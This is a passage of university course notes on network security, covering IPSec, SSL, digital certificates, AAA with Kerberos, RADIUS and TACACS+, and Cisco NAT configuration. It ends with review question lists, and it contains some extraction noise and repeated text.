dispersed locations. Non-secure IP traffic is conducted on each LAN.

The benefits of IPSec are listed below:

• IPSec in a firewall/router provides strong security to all traffic crossing the perimeter.
• IPSec in a firewall is resistant to bypass.
• IPSec is below transport layer (TCP,UDP), hence transparent to applications.
• IPSec can be transparent to end users.
• IPSec can provide security for individual users if needed (useful for offsite workers and
setting up a secure virtual subnetwork for sensitive applications).

IP Security Architecture

• Architecture: Covers the general concepts, security requirements, definitions, and

mechanisms defining IPSec technology
P a g e | 24

• Encapsulating Security Payload (ESP): Covers the packet format and general issues related
to the use
of the ESP for packet encryption and,
optionally, authentication.
• Authentication Header (AH): Covers the packet format and general issues related to the use
of AH for
packet authentication.

• Encryption Algorithm: A set of documents that describe how various encryption algorithms
are used for ESP.

• Authentication Algorithm: A set of documents that describe how various authentication

algorithms are used for AH and for the authentication option of
ESP.

• Key Management: Documents that describe key management schemes.

• Domain of Interpretation (DOI): Contains values needed for the other documents to relate
to each
other. These include identifiers for approved encryption
and authentication algorithms, as well as operational
parameters such as key lifetime.

In year 1995, Netscape developed SSLv2 and used in Netscape Navigator 1.1. The SSL
version1 was never published and used. Later, Microsoft improved upon SSLv2 and
introduced another similar protocol named Private Communications Technology (PCT).
Netscape substantially improved SSLv2 on various security issues and deployed SSLv3
in 1999. The Internet Engineering Task Force (IETF) subsequently, introduced a similar
TLS (Transport Layer Security) protocol as an open standard. TLS protocol is non-
interoperable with SSLv3. The salient features of SSL protocol are as follows −

 SSL provides network connection security through −

o Confidentiality − Information is exchanged in an encrypted form.
o Authentication − Communication entities identify each other with digital
certificates. Web-server authentication is mandatory whereas client authentication
is kept optional.
o Reliability − Maintains message integrity checks.
 SSL is available for all TCP applications.
 Supported by almost all web browsers.
 Provides ease in doing business with new online entities.
 Developed primarily for Web e-commerce.
P a g e | 25

Secure Socket Layer (SSL) Protocol

Architecture of SSL

SSL is specific to TCP and it does not work with UDP. SSL provides Application
Programming Interface (API) to applications. SSL itself is not a single layer protocol as
depicted in the image; in fact it is composed of two sub-layers.

 Lower sub-layer comprises of the one component of SSL protocol called as SSL Record
Protocol. This component provides integrity and confidentiality services.
 Upper sub-layer comprises of three SSL-related protocol components and an application
protocol. Application component provides the information transfer service between
client/server interactions. Technically, it can operate on top of SSL layer as well. Three
SSL related protocol components are −
o SSL Handshake Protocol
o Change Cipher Spec Protocol
o Alert Protocol.
 These three protocols manage all of SSL message exchanges

Record Protocol

o The record layer formats the upper layer protocol messages.

o It fragments the data into manageable blocks (max length 16 KB). It optionally compresses
the data.
o Encrypts the data.
o Provides a header for each message and a hash (Message Authentication Code (MAC)) at
the end.
o Hands over the formatted blocks to TCP layer for transmission.

SSL Handshake Protocol

o It is the most complex part of SSL. It is invoked before any application data is transmitted. It
creates SSL sessions between the client and the server.
o Establishment of session involves Server authentication, Key and algorithm negotiation,
P a g e | 26

Establishing keys and Client authentication (optional).

o A session is identified by unique set of cryptographic security parameters.
o Multiple secure TCP connections between a client and a server can share the same session.
o Handshake protocol actions through four phases.

Change CipherSpec Protocol

o Simplest part of SSL protocol. It comprises of a single message exchanged between

two communicating entities, the client and the server.
o As each entity sends the ‘Change CipherSpec’ message, it changes its side of the
connection into the secure state as agreed upon.
o The cipher parameters pending state is copied into the current state.
o Exchange of this Message indicates all future data exchanges are encrypted and integrity is
protected.

SSL Alert Protocol

o This protocol is used to report errors – such as unexpected message, bad record MAC,
security parameters negotiation failed, etc.
o It is also used for other purposes – such as notify closure of the TCP connection, notify
receipt of bad or unknown certificate, etc.
P a g e | 27

FUNDAMENTALS OF VPN TECHNOLOGY AND CRYPTOGRAPHY

(IV)
Digital Signature
A ‘Digital Signature’ is a mathematical technique used to validate the authenticity
and integrity of a message, software or digital document. Basically, a digital
certificate, also known as a public key certificate, is used to cryptographically link
ownership of a public key with the entity that owns it. Digital certificates are for
sharing public keys to be used for encryption and authentication. Digital certificates
include the public key being certified, identifying information about the entity that
owns the public key, metadata relating to the digital certificate and a digital signature
of the public key created by the issuer of the certificate.
A digital certificate, also known as a public key certificate, is used to
cryptographically link ownership of a public key with the entity that owns it. Digital
certificates are for sharing public keys to be used for encryption and authentication.
Digital certificates include the public key being certified, identifying information about
the entity that owns the public key, metadata relating to the digital certificate and a
digital signature of the public key created by the issuer of the certificate.
Public key cryptography depends on key pairs: one a private key to be held by the
owner and used for signing and decrypting, and one a public key that can be used for
encryption of data sent to the public key owner or authentication of the certificate
holder's signed data. The digital certificate enables entities to share their public key
in a way that can be authenticated.
Digital certificates are used in public key cryptography functions; they are most
commonly used for initializing secure SSL connections between web browsers and
web servers. Digital certificates are also used for sharing keys to be used for public
key encryption and authentication of digital signatures.
All major web browsers and web servers to provide assurance that any unauthorized
actors have not modified published content, and to share keys for encrypting and
decrypting web content use digital certificates. Digital certificates are also used in
other contexts, both online and offline, for providing cryptographic assurance and
privacy of data.
Digital Certificate

The digital certificate is one of the foundations of a public key infrastructure (PKI). A
digital certificate is in many ways the electronic equivalent of a passport or driver's
license, and maybe used to identify and authenticate someone making online
transactions. A certification authority issues a digital certificate to a certificate holder
on the request of a registration authority.
P a g e | 28

standard.

The public key and private key pair can be generated on a secure device. A
certification authority creates the digital certificate, incorporating the public key and
signs it, protecting the integrity of the information. The public key in a digital certificate
is linked to the private key. The certificate holder must hold the private key securely.
The security of the private key is extremely important. In many applications a private
key is stored by placing or creating the private key on a physical token such as a
smart card.

Types of digital certificates

There are three different types of digital certificates used by web servers and web
browsers to authenticate over the internet. These digital certificates are used to link
a web server for a domain to the individual or organization that owns the domain –

 Domain Validated (DV SSL) certificates offer the least amount of assurance about the holder
of the certificate. Applicants for DV SSL certificates need only demonstrate that they have the
right to use the domain name. While these certificates can give assurance that data is being sent
and received by the holder of the certificate, they give no guarantees about who that entity is.
 Organization Validated (OV SSL) certificates provide additional assurances about the holder
of the certificate; in addition to confirming that the applicant has the right to use the domain, OV
SSL certificate applicants undergo additional confirmation of their ownership of the domain.
 Extended Validation (EV SSL) certificates are issued only after the applicant is able to prove
their identity to the satisfaction of the CA. The vetting process includes verification of the
existence of the entity applying for the certificate, verifying that identity matches official records,
verifying that the entity is authorized to use the domain and confirming that the owner of the
domain has authorized the issuance of the certificate.

 Details on a digital certificate include the certificate holder's name, their public key, the
name of the certification authority and an indication of the certificate policy under
which it was issued. Most digital certificates are in the format specified in the X.509
P a g e | 29

MCQ
1. What is a Virtual Private Network (VPN)?
2. How does a VPN provide secure communication over a public network?
3. What is the purpose of a site-to-site VPN?
4. What is the difference between remote access VPN and site-to-site VPN?
5. What are the advantages of using VPN for remote access to a network?
6. How does IPsec contribute to VPN security?
7. What is the purpose of using encryption in VPN?
8. What are the different types of VPN protocols commonly used in network environments?
9. What is the purpose of a VPN concentrator?
10. What is the significance of proper VPN configuration and encryption protocols for data
privacy?
11. What is the purpose of a VPN client in establishing a VPN connection?
12. How does tunneling contribute to secure transmission of data in a VPN?
13. What is the purpose of a VPN profile?
14. What is the role of SSL/TLS in VPN security?
15. What are the potential challenges of implementing VPN in a large-scale network?
16. What is the purpose of split tunneling in VPN?
17. What are the advantages of using VPN over traditional dedicated leased lines for network
connectivity?
18. What is the purpose of a VPN gateway in establishing VPN connections?
19. What is the potential impact of misconfigured VPN settings on network connectivity?
20. What is the purpose of using multi-factor authentication in VPN?
21. What is the role of VPN concentrators in handling multiple VPN connections simultaneously?
22. What are the potential security risks and vulnerabilities associated with VPN
implementations?
23. What is the purpose of implementing two-factor authentication in VPN?
24. What is the significance of VPN monitoring and logging in network security?
25. What are the potential security risks associated with VPN protocols that use weak encryption
algorithms?
26. What is the purpose of implementing network segmentation in VPN environments?
27. What is the role of VPN encryption in ensuring data privacy during transmission?
28. What are the potential security risks associated with using outdated VPN protocols?
P a g e | 30

SAQ

1. What does VPN stand for in the context of networking?

2. Explain the concept of a Virtual Private Network (VPN) and its purpose.
3. How does a VPN provide secure communication over a public network?
4. Configure a site-to-site VPN tunnel between two Cisco routers.
5. Discuss the differences between remote access VPN and site-to-site VPN.
6. Evaluate the advantages and disadvantages of using VPN for remote access to a network.
7. Design a VPN solution that utilizes both IPsec and SSL/TLS protocols.
8. What are the primary components of a VPN architecture?
9. What is the role of a VPN client in establishing a VPN connection?
10. How does tunneling ensure secure transmission of data in a VPN?
11. Configure a VPN concentrator to allow remote access VPN connections.
12. Explain the process of VPN tunnel establishment and key exchange protocols.
13. Assess the significance of proper VPN configuration and encryption protocols for data privacy.
14. Create a VPN configuration that allows split tunneling for specific traffic.
15. What are the types of VPN protocols commonly used in network environments?
16. What is the difference between a VPN concentrator and a VPN endpoint?
17. How does VPN encryption protect data transmitted over the internet?
18. Configure a VPN client to connect to a remote VPN server using the OpenVPN protocol.
19. Discuss the potential challenges and considerations of implementing VPN in a large-scale
network.
20. Evaluate the impact of VPN on network performance and bandwidth utilization.
21. Design a VPN configuration that utilizes two-factor authentication for client connections.
22. What are the advantages of using VPN over traditional dedicated leased lines for network
connectivity?
23. What is the purpose of VPN tunnel encapsulation?
24. How does VPN handle routing and addressing between remote networks?
25. Configure a VPN profile on a mobile device for secure access to a corporate network.
26. Explain the role of VPN concentrators in handling multiple VPN connections simultaneously.
27. Assess the security risks and vulnerabilities associated with VPN implementations.
28. Create a VPN configuration that allows network traffic to traverse NAT devices.
29. What are the considerations for choosing the appropriate VPN encryption algorithm?
30. What is the purpose of a VPN gateway in establishing VPN connections?
P a g e | 31

IMPLEMENT AAA ON CISCO ROUTERS

CLASS NOTES

The term authentication, authorization, and accounting (AAA) refers to a variety

of common security features. This section focuses on the first "A" in AAA—
authentication—and how it is used to manage access to a router or IOS switch's
user mode and privileged mode.

Authentication Identifies and verifies the remote user. This process can take the form of a
simple password or user name/password combination verified locally by the
NAS, or it could use one or more authentication servers and technologies, such
as one-time passwords (OTPs) or tokens.
Authorization Determines what devices, features, or services a specific remote user is
authorized to access in the network, such as network resources or services. This
concept is much like that of user permissions in the Windows server model.
Accounting Allows the network administrator to define a process for tracking the services
remote users are accessing. The data collected can be used for client billing,
auditing, or network planning.

Why Authenticate?
Not too long ago, PCs didn’t require a user to type in their user name and/or a
password. The computer powered up, and whoever was sitting at the keyboard had
full access to anything stored on the machine. Even many networked computers
were configured without a login requirement because, after all, “everybody was just
like family.” This would be the ultimate “open” system.
It didn’t take long to determine that possibly everyone in the family doesn’t need to
see the checkbook program or read each other’s e-mails, but, to protect those
resources, it was necessary to know who was sitting at the keyboard. Some
applications experimented with using passwords, and people learned to use
password protection on shared resources like folders or printers. Once a password
was created, it had to be shared with anyone who needed access. If more than one
shared resource existed, one of two problems arose. Either unique passwords were
necessary for each resource, requiring some users to keep track of multiple
passwords and the resource they were associated with, or the same password was
used, which meant any user who had legitimate access to one protected resource
now had the password for all protected resources.
If someone left under less-than-favorable circumstances, all passwords known to
that person had to be changed, and then the other users had to be told about the
changes. These early efforts showed right away that leaving security up to the
individual users wasn’t reliable and wouldn’t scale well as the network group.
Many organizations have this same problem with the user names/and or passwords
used to access their network devices, such as routers and switches, by storing the
access user name and/or password locally on the device. The following output
demonstrates access requiring onlya password (line con 0 and line aux 0) and
access using the local database (line vty 0 4).
P a g e | 32

The preceding techniques were covered in Chapter 2. While both methods work, they
have the same shortfalls and security issues as the early networking administrators faced
with user data and applications. The example could be made more secure by using
techniques covered in Chapter 2, including the following:
 Using a different password for each access point
 Using complex passwords containing eight or more characters, incorporating
uppercase and lowercase letters, plus numbers and symbols
 Requiring routine password changes
 Using the service password-encryption command to hide the
passwords from wandering eyes that could see the configuration
The encryption also reduces the chances of someone being able to capture the
passwords if the configuration is included in a Telnet session. Telnet transmits all
communications in cleartext.

Centralized Authentication

The lack of scalability and reliability limitations associated with locally stored
authentication can only be overcome by using some form(s) of centralized
authentication server. Network operating systems (OSs) typically have this feature at
their core. In addition to allowing access to the network, this system usually is linked
to a mechanism for matching login IDs with permissions to use protected resources.
While all authenticated users might have permission to use any of the network
printers, only members of the “accounting” group might be granted “permission” to
access to the Accounting Department servers. And maybe only those accounting
group members who are also part of the “payroll” group might be granted access to
the payroll software and data.
If a payroll accountant leaves the company under any circumstances, it’s only
necessary to delete their user account, which also removes them from the
accounting and payroll groups, maintaining security for those assets.
AAA is a technology that can work independently or with the network security system
to provide centralized authentication, authorization, and accounting security for
network devices and remote user access. Figure 3-3 demonstrates a simple example
of AAA and a NAS server providing secure access to a company network. With only
authentication features, the remote user could have access to both the server (web
server possibly) and the company network. With authorization implemented, it would
be possible to allow the modem user access to both, while limiting the ISDN user to
one or the other.

AAA Benefits
Cisco’s AAA technology centralized network access security provides many
benefits to the organization and network administrator, including the following:
 Increased flexibility
 Increased security
 Scalability
 Standard authentication methods
P a g e | 33

 Multiple backup systems

Increased Flexibility
AAA’s support of authorization, in addition to authentication, means access can be
maintained on a “need to have” basis, without having to maintain multiple passwords.
The accounting support means that user auditing and cost-allocation policies can be
implemented, as well as providing a trail that might be useful in troubleshooting
network problems.
Increased Security
Multiple devices with the same locally administered user name/password offer a low
level of security. Everyone having access to everything, without regard for need,
also unnecessarily increases risk. Multiple locally administered passwords would
appear to increase security, but might lead to employees writing down passwords if
too many exist to remember. This situation would be exacerbated if complex
passwords were implemented.
AAA, with its centralized security database and authorization features, allows a
single secure user name/password combination for each employee and yet allows
restricting access to a “need to have” basis. At the same time, AAA allows for rapid
resolution of compromised passwords or terminated employees.
Scalability

AAA is a template approach to security management that remains reliable and

flexible as the network grows larger and more complex. By centralizing the security
databases and supporting authorization, AAA avoids the nightmare of managing
many user name/password combinations in a growing environment or the alternative
“weak” security of using a small number of combinations. Locally stored
authentication means any time there’s a potential of a compromised user
name/password or termination of an employee, each device “should” be
reconfigured. The more devices that exist, the greater the amount of effort. AAA
avoids this in much the same way that server security is maintained under the same
circumstances.
Standard Authentication Methods
AAA supports RADIUS, TACACS+, and Kerberos security protocols for securing
dial-in sessions. These protocols provide secure authentication, including encrypted
communications and interaction with network server security systems. The next
section compares these three systems.
Multiple Backup Systems

AAA supports multiple security servers, such as TACACS+, on the same network to
provide redundancy in case of device failure or link congestion. In addition, AAA
allows for multiple authentication methods to be specified so, if the first one is
unavailable, then a second or third option could be used. For example, if the
specified TACACS+ server is offline, the locally stored user name/password
database could possibly be used or maybe even the enable password. These
alternatives must be defined in advance or access could be blocked until the
specified service is restored.
P a g e | 34

TACACS+, RADIUS, and Kerberos Support

AAA supports all three of these security protocols to control dial-up access into
networks. You look, in turn, at each, but note that Cisco supports Kerberos as a
legacy security protocol for those networks already committed to it. Cisco Secure
Access Control Server (ACS), covered in the next chapter, only implements
TACACS+ and RADIUS databases.
At the most obvious level, each of these three protocols does the same thing. Each
provides a secure authentication process that allows remote users to access an
organization’s network resources. At the nuts and bolts level, these are quite different
systems, requiring several chapters to detail. The good news is this: that detailed
information exists in many places, including Cisco’s web site, which is where it’s
going to stay. This chapter covers those features and differences that might be on
the certification exams and would allow a person to choose among them for
implementation, or at least to move ahead with intelligent research.
Kerberos is covered first, and then TACACS+ and RADIUS are compared to help
determine which should be implemented as part of Cisco Secure ACS.
N.B:-It’s important to make sure that TACACS+, RADIUS, or Kerberos server services
are properly configured before adding the client features to the NAS.
Otherwise, you could lock yourself out and require a password recovery.

Kerberos

Kerberos derives its name from the three-headed dog that guards the gates of
Hades in Greek mythology. Kerberos, the security protocol, is an authentication
system developed at the Massachusetts Institute of Technology (MIT), which uses
the Data Encryption Standard (DES) cryptographic algorithm for encryption and
authentication. Kerberos is based on the assumption that internal users are no more
inherently trustworthy than external users and, therefore, applies security and
encrypted communications for services like Telnet for all users.
Kerberos is designed to enable two parties to exchange private information across
an otherwise open network like the Internet by assigning a unique key, called a
ticket, to each user that logs on to the network. The ticket is then embedded in
messages to identify the sender of the message. Kerberos is based on the concept
of a trusted third party, called the key distribution center (KDC), a Kerberos
authentication server (AS), performing secure verification of all users and services
on the network. This verification involves exchanging encrypted authentication
messages without transmitting the user password.
The “lite” explanation of using Kerberos to gain network access might help.
1. A remote user opens a PPP connection to an organization’s NAS router.
2. The router prompts the user for a user name and a password.
3. The router then uses only the user name to request a ticket or credential verifying
the user identity (TGT) from the key distribution center (KDC).
4. Assuming the user name is known to the KDC, an encrypted TGT is sent back to
the router, which includes (among other things) the user’s identity. The ticket has
a limit life of eight hours to reduce the exposure to an unauthorized capture and
replay attempt.
P a g e | 35

5. The router uses the password from Step 2 to decrypt the TGT. If the decryption is
successful, the remote user is authenticated to the router and granted access to
the network.
When a remote user successfully authenticates at a boundary router, the user and
the user’s machine become part of the network. Another TGT from the KDC is
necessary to access network services because the original TGT is stored on the
router and isn’t used for additional authentication, unless the user physically logs on
to that router.
Securing a network service involves a double encryption. When a user requests
access to a network service, such as a printer or Telnet access to a host, the KDC
creates a service credential. This service credential contains the client’s identity, the
desired network service’s identity, and a time limit. The service credential is
encrypted first using a password shared by the KDC and the service. The result is
encrypted again using the user’s TGT as the key.
The target service uses the TGT supplied by the user to perform the first decryption.
If the result can be successfully decrypted using the password shared by the KDC
and the service, then the service is available.
Since Cisco IOS 11.2, organizations already using Kerberos 5 security can use their
existing authentication servers to authenticate their routers and switches. The IOS
software Kerberos authentication capabilities support the following network services:
 Telnet
 rlogin
 rsh
 rcp
The previous applications are said to be Kerberized, applications and services
that have been modified to support the Kerberos credential infrastructure and
encrypted communications.
Driver’s License Analogy
An analogy commonly used for Kerberos is a state driver’s license, wherein the state
is the KDC that issues a TGT, the license. The license contains information that
can authenticate the user: the picture and description items. In addition, the
permissions, such as motorcycle endorsement, and restrictions, such as glasses
required, associated with the license are also included. Like a TGT, the license also
has an expiration time after which it’s no longer valid.
Some states include an authentication code made up of portions of the key supplied
data, such as name and birth date. Any crude attempt to alter part of the key data
makes the authentication code not match.
To complete the analogy, a third party accepts the TGT, license, and, after
confirming the picture and description, trusts that the state did a reasonable job in
confirming the identity before issuing the license, and thereby accepts it as proof of
identity, age, or the right to drive.
RADIUS

Remote Authentication Dial-In User Service (RADIUS) is an access server

authentication, authorization, and accounting protocol developed by Livingston
Enterprises, Inc., now a division
P a g e | 36

of Lucent Technologies. RADIUS is a system of distributed security that secures

remote access to networks and network services against unauthorized access.
RADIUS is a fully open protocol, distributed in source code format that can be
modified to work with any security system currently available on the market.
Numerous implementations of RADIUS server code are commercially and freely
available. Cisco’s servers include CiscoSecure ACS for Windows, CiscoSecure
UNIX, and Cisco Access Registrar. Several IETF RFCs define the RADIUS protocol,
but currently it’s still a proposed standard.
A RADIUS implementation is made of the three following components:
 Protocol using UDP/IP communication.
 RADIUS server—a service running on a central Windows or UNIX server, typically
at the customer’s site.
 RADIUS client—a service residing in the dial-up access servers that can be
distributed throughout the network. Cisco added RADIUS client support beginning
with IOS v11.1.
Client/Server Model
A NAS router running the RADIUS client service passes user information to defined
RADIUS server(s), and then acts, based on the response received. The RADIUS
server responds to all user connection requests, authenticating the user, and then
forwarding all configuration information needed for the client to provide the service to
the user. RADIUS servers can act as proxy clients for other types of authentication
servers. The RADIUS server, after reviewing the credentials, replies to the client with
one of the following responses:
 Accept The user is authenticated.
 Reject The user is not authenticated and access is denied. The user will be
prompted to reenter the user name/password.
 Challenge A request for more information from the user to confirm identity.
 Change Password The user must change their password.
Network Security Technology
RADIUS clients and servers use a shared secret technology for all authentications
transactions. The shared secret is never sent over the network. To eliminate
the possibility of someone successfully snooping a user’s password on an
unsecured network, any transmitted user passwords are sent encrypted between the
client and RADIUS server.
Flexiblity
RADIUS server supports a variety of methods to authenticate a user, including
PPP PAP or CHAP, MS-CHAP, UNIX login, and others.
Interoperability
The other side of any open standard is that it doesn’t always guarantee
interoperability with other vendors’ implementations’. RADIUS’s implementations
between different vendors can vary because the RADIUS standard specifically
allows vendors to offer custom features or attributes in what are called AV pairs. If
a vendor device doesn’t recognize the AV pair, it ignores it. To
P a g e | 37

demonstrate the variations, the IETF implementation supports attributes, while

Ascend supports
254. Cisco currently supports 58 attributes on Cisco Secure ACS, access servers,
Ethernet switches, PIX firewalls, and VPN 3000 concentrators.
TACACS+
Terminal Access Controller Access Control System Plus (TACACS+) is an
authentication protocol that allows an NAS to communicate with an authentication
server to determine if a user has access to the network.
TACACS+, a new protocol developed by Cisco, replaces two earlier industry
standards: TACACS and XTACACS (Extended Terminal Access Controller Access
Control System). TACACS+ isn’t compatible with the two older protocols. Cisco has
submitted TACACS+ protocol specification in a draft RFC to the IETF for
development of a standard and for those customers interested in developing their
own TACACS+ software.
TACACS+ server services are maintained in a database on a TACACS+ daemon
running on a Windows 2000/NT or UNIX host. Cisco’s servers supporting TACACS+
include CiscoSecure ACS for Windows, CiscoSecure UNIX, and Cisco Access
Registrar. Cisco Access Servers (Cisco Secure ACS) can implement both
TACACS+ and RADIUS. The underlying architecture of TACACS+ protocol
complements the AAA architecture.
TACACS+ and RADIUS Compared

This section compares several key features of TACACS+ and RADIUS to help
understand the strengths and weaknesses of each. While counterpointing many of
these comparisons is possible and the information is useful, remember, in the long
run, it’s Cisco’s certification and their comparison.
Authentication and Authorization
RADIUS combines the authentication and authorization services. The access-accept
packets sent by the RADIUS server in cleartext to the client contain authorization
information. Accounting is a separate service on the RADIUS server.
TACACS+ fully supports the AAA architecture by separating the authentication,
authorization, and accounting. This allows the flexibility of using another service,
such as Kerberos, for authentication, while still using TACACS+ for authorization
and/or accounting.
UDP vs. TCP
TACACS+ uses TCP for connection-oriented transport between clients and servers.
TCP port 49 is reserved for TACACS+. RADIUS uses UDP for best-effort delivery,
requiring additional variables to be defined, such as retransmit attempts and time-
outs to compensate.
The acknowledgements (TCP ACK) provide indications that a request has been
received within (approximately) a network round-trip time (RTT). This same TCP
process uses RST (reset) packets to provide immediate indication of a failed (or
offline) authentication server. UDP can’t tell the difference between a failed server, a
slow server, and a nonexistent server.
TCP keepalive packets can be used to watch for failed servers and to facilitate rapid
failover between multiple connected authentication servers.
TCP scales better and adapts better to growing and/or congested networks.
38

Challenge/Response
RADIUS supports only unidirectional challenge/response from the RADIUS server
to the RADIUS client. TACACS+ supports bidirectional challenge/response like
CHAP between the two NASs.
Multiprotocol Support
Both TACACS+ and RADIUS support SLIP and PPP encapsulation protocols,
but RADIUS doesn’t support the following TACACS+ supported protocols:
 Novell Asynchronous Services Interface (NASI)
 X.25 PAD connection
 Net BIOS Frame Protocol Control protocol
 AppleTalk Remote Access protocol (ARAP)
Packet Encryption
RADIUS encrypts only the password in the access-request packet from the client to
the server, using MD5 hashing for security. The remainder of the packet is in
cleartext exposing information such as user name, authorized services, and
accounting to be captured by snooping.
TACACS+ encrypts the entire data payload of the packet leaving only the standard
TACACS+ header in cleartext. While leaving the body of the packets unencrypted is
possible for debugging purposes, normal operation fully encrypts the body for more
secure communications. A field in the header indicates whether the body is
encrypted.
Router Management
RADIUS doesn’t support limiting the user access to specific router commands
as a tool for router management or terminal services.
TACACS+ supports two methods for controlling the authorization of router
commands on either a per-user or a per-group basis.
 Assign commands to privilege levels and have the router use TACACS+ to verify
that the user is authorized at the specified privilege level.
 Explicitly define the commands allowed on a per-user or a per-group basis on
the TACACS+ server.
39

MCQ
1. What does AAA stand for in the context of network authentication?
2. What is the purpose of AAA authentication in network security?
3. Which layer of the OSI model does AAA authentication operate at?
4. What are the three components of AAA authentication?
5. What is the purpose of the authentication server in AAA authentication?
6. How does AAA authentication handle user authentication requests from network devices?
7. Which command is used to configure AAA authentication on a Cisco router?
8. What is the difference between AAA authentication and local authentication on network
devices?
9. What is the purpose of AAA authorization in network security?
10. Which statement accurately describes AAA accounting?
11. What is the purpose of the accounting server in AAA authentication?
12. Which type of information can be collected through AAA accounting?
13. What is the difference between AAA authentication and AAA authorization?
14. What is the purpose of AAA accounting in network security?
15. What is a common protocol used for AAA authentication and accounting?
16. Which statement accurately describes the role of AAA authentication in network security?
17. What is the difference between RADIUS and TACACS+ in AAA authentication?
18. What is the purpose of AAA accounting in network security?
19. What is the difference between AAA accounting and AAA authorization?
20. Which statement accurately describes the purpose of AAA accounting?
21. What is the purpose of the authorization server in AAA authentication?
22. What is the difference between RADIUS and TACACS+ in AAA authentication?
23. What is the purpose of AAA accounting in network security?
24. Which statement accurately describes the role of AAA authentication in network security?
25. What is the difference between RADIUS and TACACS+ in AAA authentication?
26. What is the purpose of AAA accounting in network security?
27. What is the difference between AAA accounting and AAA authorization?
28. Which statement accurately describes the purpose of AAA accounting?
40

SAQ
1. What does AAA stand for in the context of network authentication?
2. Explain the concept of AAA authentication and its role in network security.
3. How does AAA authentication differ from local authentication on network devices?
4. Configure AAA authentication on a Cisco router to use a remote RADIUS server for user
authentication.
5. Discuss the benefits of using AAA authentication for centralized user management and
access control.
6. Evaluate the advantages and disadvantages of using AAA authentication compared to
other authentication methods.
7. Design a AAA authentication configuration that utilizes both local and remote
authentication methods.
8. What are the three components of AAA authentication?
9. What is the purpose of the authentication server in AAA authentication?
10. How does AAA authentication handle user authentication requests from network devices?
11. Configure a Cisco switch to use TACACS+ authentication for administrative access.
12. Explain the process of AAA authentication when multiple authentication methods are
configured.
13. Assess the significance of proper AAA authentication configuration for network security
and access control.
14. Create a AAA authentication configuration that allows users to authenticate using both
local accounts and Active Directory credentials.
15. What are the primary differences between RADIUS and TACACS+ in AAA authentication?
16. What is the purpose of the authorization server in AAA authentication?
17. How does AAA authentication provide granular access control based on user roles and
privileges?
18. Configure AAA authentication to require multi-factor authentication for specific user
accounts.
19. Discuss the potential impact of a misconfigured AAA authentication configuration on
network access.
20. Evaluate the scalability and performance considerations of using AAA authentication in
large network environments.
21. Design a AAA authentication configuration that utilizes certificate-based authentication for
wireless network access.
22. What is the purpose of the accounting server in AAA authentication?
23. What types of information can be collected through AAA accounting?
24. How does AAA authentication contribute to auditing and compliance requirements in
network environments?
25. Configure AAA accounting to log user activity for a specific network device.
26. Explain the role of AAA authentication in preventing unauthorized access to network
resources.
27. Assess the impact of a compromised authentication server on network security.
28. Create a AAA authentication configuration that allows users to authenticate using biometric
credentials.
29. What are the different methods of implementing AAA authentication in Cisco devices?
BRAINWARE UNIVERSITY

[Bncs502B] [Security Specialist]

NAT
CLASS NOTES

Q.1. What is NAT?

Network Address Translation translates the private addresses into public
addresses before packets are routed to a public network. It allows a
network device such as a router to translate addresses between the private
and public network.

Q.2. What are the Situations where NAT is required?

1. When we need to connect to the internet and our hosts don't have globally
unique IP addresses.
2. When we want to hide internal IP addresses from outside for security purpose.
3. A company is going to merge in another company which uses same address space.

Q.3.What are the advantages of Nat?

1. It conserves legally registered IP addresses.
2. It prevents address overlapping.
3. Provides security by hiding internal (private) IP addresses.
4. Eliminates address renumbering as a network evolves.

Q.4.What are different types of NAT?

There are mainly three types of NAT:- 1. Static NAT
2. Dynamic NAT
3. Port Address Translation (Overloading)

Q.5.What is Static NAT?

Static NAT allows for one to one mapping that is it translates one private
IP address to one public IP address.
R1(config)# ipnat inside source static 10.1.1.1
15.36.2.1 R1(config)# int fa0/0
R1(config-if)#ipnat inside /(It identifies this interface as the inside
interface)/ R1(config)# int fa0/1
R1(config-if)#ipnat outside /(It identifies this interface as the outside interface)/

In ip nat inside source command, we can see that the command is

referencing the inside interface as source or starting point of the translation.

Q.6. What is Dynamic NAT?

It maps an unregistered IP address to a registered IP address from out of a
pool of registered IP addresses.
R1(config)# ipnat pool CCNA 190.1.1.5 190.1.1.254 netmask
255.255.255.0 R1(config)#ipnat inside source list 10 pool
2022-23 Prepared by: Dept. Of Cyber Security (Brainware University, Barasat)
BRAINWARE UNIVERSITY

[Bncs502B] [Security Specialist]

CCNA
R1(config)# int fa0/0
R1(config-if)#ipnat inside /(It identifies this interface as//the //inside//interface)/
R1(config)# int fa0/1
R1(config-if)#ipnat outside /(It identifies this interface as //the//
//outside//interface)/
R1(config)# access-list 10 permit 192.168.1.0 0.0.0.255 /(To specify which
unregistered addresses needs to be translated)/

Q.7. What is Port Address Translation (Overloading)?

It maps multiple unregistered IP addresses to a single registered IP
address using different port numbers. PAT allows thousands of users to
connect to internet using one public address only.
R1(config)# ipnat pool CCNA 190.1.1.5 190.1.1.254 netmask
255.255.255.0 R1(config)#ipnat inside source list 10 pool
CCNA overload
R1(config)# int fa0/0
R1(config-if)#ipnat inside /(It identifies this interface as the//inside//interface)/
R1(config)# int fa0/1
R1(config-if)#ipnat outside /(It identifies this interface as//the //outside//interface)/
R1(config)# access-list 10 permit 192.168.1.0 0.0.0.255 /(To specify which
unregistered addresses needs to be translated)/

Q.8. What are Inside Local, Inside Global, Outside Local, Outside Global address?
An Inside local address is an IP address of host before
translation. Inside Global address is the public IP address
of host after translation.
Outside Local address is the address of router interface
connected to ISP. Outside Global address is the address of the
outside destination.

Static NAT (Network Address Translation) - Static NAT (Network Address

Translation) is one-to-one mapping of a private IP address to a public IP address.

Static NAT (Network Address Translation) is useful when a network device inside a
private network needs to be accessible from internet.

2022-23 Prepared by: Dept. Of Cyber Security (Brainware University, Barasat)

BRAINWARE UNIVERSITY

[Bncs502B] [Security Specialist]

Dynamic NAT (Network Address Translation) - Dynamic NAT can be defined as

mapping of a private IP address to a public IP address from a group of public IP
addresses called as NAT pool. Dynamic NAT establishes a one-to-one mapping
between a private IP address to a public IP address. Here the public IP address is
taken from the pool of IP addresses configured on the end NAT router. The public to
private mapping may vary based on the available public IP address in NAT pool.

PAT (Port Address Translation) - Port Address Translation (PAT) is another type of
dynamic NAT which can map multiple private IP addresses to a single public IP
address by using a technology known as Port Address Translation.

Here when a client from inside network communicate to a host in the internet, the router
changes the source port (TCP or UDP) number with another port number. These port
mappings are kept in a table. When the router receive from internet, it will refer the table
which keep the port mappings and forward the data packet to the original sender.

2022-23 Prepared by: Dept. Of Cyber Security (Brainware University, Barasat)

BRAINWARE UNIVERSITY

[Bncs502B] [Security Specialist]

MCQ
1. What is Network Address Translation (NAT)?
2. What is the purpose of Network Address Translation (NAT) in a network?
